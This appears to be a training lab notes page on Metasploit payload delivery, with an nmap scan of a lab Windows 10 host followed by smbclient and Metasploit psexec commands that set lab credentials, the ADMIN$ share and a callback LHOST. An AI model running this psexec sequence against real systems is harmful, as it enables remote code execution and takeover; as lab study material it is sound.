Automating Payloads & Delivery with Metasploit

April 27, 2024

# Nmap 7.94 scan initiated Sat Apr 27 23:41:51 2024 as: nmap -sC -sV -oN nmap -vv 10.129.68.35
Increasing send delay for 10.129.68.35 from 0 to 5 due to 62 out of 206 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.129.68.35 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Nmap scan report for 10.129.68.35
Host is up, received syn-ack (0.34s latency).
Scanned at 2024-04-27 23:41:51 PST for 400s
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE     REASON  VERSION
7/tcp    open  echo        syn-ack
9/tcp    open  discard?    syn-ack
13/tcp   open  daytime     syn-ack Microsoft Windows USA daytime
17/tcp   open  qotd        syn-ack Windows qotd (English)
19/tcp   open  chargen     syn-ack
80/tcp   open  http        syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc       syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsof@  syn-ack Windows 10 Pro 18363 microsoft-ds (workgroup: WORKGROUP)
2179/tcp open  vmrdp?      syn-ack
Service Info: Host: SHELLS-WIN10; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 57959/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 50733/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 25647/udp): CLEAN (Failed to receive data)
|   Check 4 (port 20860/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h20m05s, deviation: 4h02m30s, median: 4s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-27T15:48:07
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 18363 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Shells-Win10
|   NetBIOS computer name: SHELLS-WIN10\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-27T08:48:08-07:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 27 23:48:31 2024 -- 1 IP address (1 host up) scanned in 400.77 seconds
 smbclient -L 10.129.68.35 -U htb-student
search smb
use 63
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71

msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$

msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!

msf6 exploit(windows/smb/psexec) > set SMBUser htb-student

msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.197
PreviousIntroduction to PayloadsNextCrafting Payloads with MSFvenom

Last updated